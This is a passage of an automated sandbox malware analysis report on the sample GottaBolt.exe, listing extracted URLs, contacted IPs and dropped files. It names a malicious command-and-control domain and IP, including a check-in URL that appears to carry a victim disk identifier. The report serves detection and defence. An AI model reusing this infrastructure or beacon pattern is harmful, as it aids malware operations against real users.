                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1572405293.000002AF48D79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://go.micropowershell.exe, 00000011.00000002.1572405293.000002AF48635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2167514556.0000015A4EF14000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.micro/pki/crl/productCerAut_2010-06-2powershell.exe, 0000000A.00000002.1444356293.000001A95442C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsps.ssl.com0?GottaBolt.exefalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0GottaBolt.exefalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QGottaBolt.exefalse
                                    		high
                                    http://ocsps.ssl.com0GottaBolt.exefalse
                                      		high
                                      http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0GottaBolt.exefalse
                                        		high
                                        http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0GottaBolt.exefalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1572405293.000002AF48D79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1571572984.000002AF4737B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0GottaBolt.exefalse
                                              		high
                                              https://dfssinstitute.com/?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dGottaBolt.exe, 00000000.00000002.1510540109.0000026506641000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506775000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265067C7000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.000002650679E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://crls.ssl.com/ssl.com-rsa-RootCA.crl0GottaBolt.exefalse
                                                		high
                                                http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0GottaBolt.exefalse
                                                  		high
                                                  http://crl.microGottaBolt.exe, 00000000.00000002.1522769517.0000026521EDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1444356293.000001A95442C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1439564457.000001A94C296000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2741137716.0000017617574000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664130053.000002AF574D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48DD3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ssl.com/repository0GottaBolt.exefalse
                                                            		high
                                                            https://oneget.orgXpowershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://dfssinstitute.comGottaBolt.exe, 00000000.00000002.1510540109.000002650670C000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066AF000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506775000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.000002650679E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aka.ms/pscore68powershell.exe, 0000000A.00000002.1412510517.000001A93C221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.0000017607501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF47461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2167514556.0000015A4E86D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2167514556.0000015A4E85A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.o_(powershell.exe, 00000011.00000002.1571572984.000002AF4737B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGottaBolt.exe, 00000000.00000002.1510540109.0000026506641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1412510517.000001A93C221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.0000017607501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF47461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2167514556.0000015A4E82D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0GottaBolt.exefalse
                                                                    		high
                                                                    http://crl.vpowershell.exe, 0000000A.00000002.1442957411.000001A954223000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://dfssinstitute.comGottaBolt.exe, 00000000.00000002.1510540109.0000026506698000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506775000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066A5000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265067C7000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.000002650679E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.0000017607727000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://oneget.orgpowershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://ocsps.ssl.com0PGottaBolt.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        77.91.73.101
                                                                        		dfssinstitute.comRussian Federation
                                                                        		42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue
                                                                        172.86.76.228
                                                                        		unknownUnited States
                                                                        		9009M247GBfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1561030
                                                                        Start date and time:2024-11-22 17:02:10 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 45s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:24
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Sample name:GottaBolt.exe
                                                                        Detection:MAL
                                                                        Classification:mal69.evad.winEXE@16/17@1/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 50%
                                                                        HCA Information:
                                                                        • Successful, ratio: 88%
                                                                        • Number of executed functions: 14
                                                                        • Number of non-executed functions: 6
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiApSrv.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ocsps.ssl.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 7704 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: GottaBolt.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        11:03:11API Interceptor122x Sleep call for process: GottaBolt.exe modified
                                                                        11:03:18API Interceptor3608x Sleep call for process: powershell.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        No context

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUT0jSGXdxX5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 185.149.146.15
                                                                        PC4rbXSgl4.exeGet hashmaliciousUnknownBrowse
                                                                        • 77.91.77.187
                                                                        file.exeGet hashmaliciousPhorpiexBrowse
                                                                        • 77.91.77.92
                                                                        i52xoegJro.exeGet hashmaliciousAmadeyBrowse
                                                                        • 77.91.77.82
                                                                        Jl5yg1Km2s.exeGet hashmaliciousAmadeyBrowse
                                                                        • 77.91.77.82
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 77.91.101.71
                                                                        IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                                        • 77.91.101.71
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 77.91.101.71
                                                                        Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                                        • 77.91.101.71
                                                                        Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                                                        • 77.91.101.71
                                                                        M247GBmpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 38.205.138.228
                                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                                        • 91.202.233.169
                                                                        http://ok.clicknowvip.comGet hashmaliciousUnknownBrowse
                                                                        • 38.132.109.126
                                                                        owari.mips.elfGet hashmaliciousUnknownBrowse
                                                                        • 38.202.251.241
                                                                        ppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 213.182.204.57
                                                                        hmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 213.182.204.57
                                                                        file.exeGet hashmaliciousNetSupport RATBrowse
                                                                        • 45.61.128.74
                                                                        file.exeGet hashmaliciousNetSupport RATBrowse
                                                                        • 45.61.128.74
                                                                        yhYrGCKq9s.exeGet hashmaliciousRedLineBrowse
                                                                        • 91.202.233.18
                                                                        meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                                        • 38.201.237.116

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0ePayment CCF20240531_0002.htmlGet hashmaliciousUnknownBrowse
                                                                        • 77.91.73.101
                                                                        bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                        • 77.91.73.101
                                                                        bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                        • 77.91.73.101
                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                        • 77.91.73.101
                                                                        http://cdn.prod.website-files.com/65dccdc21b806b929439370e/66e00f5491860971b9b9ef25_80703488528.pdfGet hashmaliciousUnknownBrowse
                                                                        • 77.91.73.101
                                                                        2.ps1Get hashmaliciousUnknownBrowse
                                                                        • 77.91.73.101
                                                                        BX9IkWcF80.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 77.91.73.101
                                                                        VKXD1NsFdC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 77.91.73.101
                                                                        hx0XzDVE1J.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 77.91.73.101
                                                                        PZI8hMQHWg.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        • 77.91.73.101

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GottaBolt.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GottaBolt.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1583
                                                                        Entropy (8bit):5.362359765918443
                                                                        Encrypted:false
                                                                        SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6okHNpOtHTHhAHKKk9Hj:iq+wmj0qCYqGSI6oktpOtzHeqKk9D
                                                                        MD5:C9D2B602C30A947D47A7AD769B3C8127
                                                                        SHA1:D80EB805D03D1D001A988B565C3535C81596FE93
                                                                        SHA-256:B404D07115AAAC07450587F37EE92C761E4DB6C07538C43081C1364460BA7FB5
                                                                        SHA-512:F64E9D0C4F368C0894EA51D50C734E9C5418DDC69FD32F74CCDDFBBE1C4BD29E6B0C6C825E4A46FA7527F6A18DBA6AFB22CF094BE3A711AC16028801543301EC
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):11608
                                                                        Entropy (8bit):4.890472898059848
                                                                        Encrypted:false
                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                        MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                        SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                        SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                        SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                        Malicious:false
                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vevmusr.nqz.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2mwkact.wef.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahisnr2y.b3k.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxmbzzo1.k5n.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikynrnky.xdl.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwldzi0j.0cl.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpncv3na.1t3.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1msvj22.vdv.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sklswoln.agl.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpovo2su.2ni.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GottaBolt.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):793
                                                                        Entropy (8bit):5.5697368795610105
                                                                        Encrypted:false
                                                                        SSDEEP:24:Qgian9931p9mz31ph9mskiytRN9F6hWNv6ixffO51CXqiXbZm5:Qgi0121sisvF3q51UqiX0
                                                                        MD5:07312A944BA65BD9A7150F129DBE1229
                                                                        SHA1:C4D82FD6EB5DB2929324B4A4DBCFF452965E3910
                                                                        SHA-256:D516C2509BEDF3D9CA5C6358FE7CA928AEAE8D87436CB86826297750724B446D
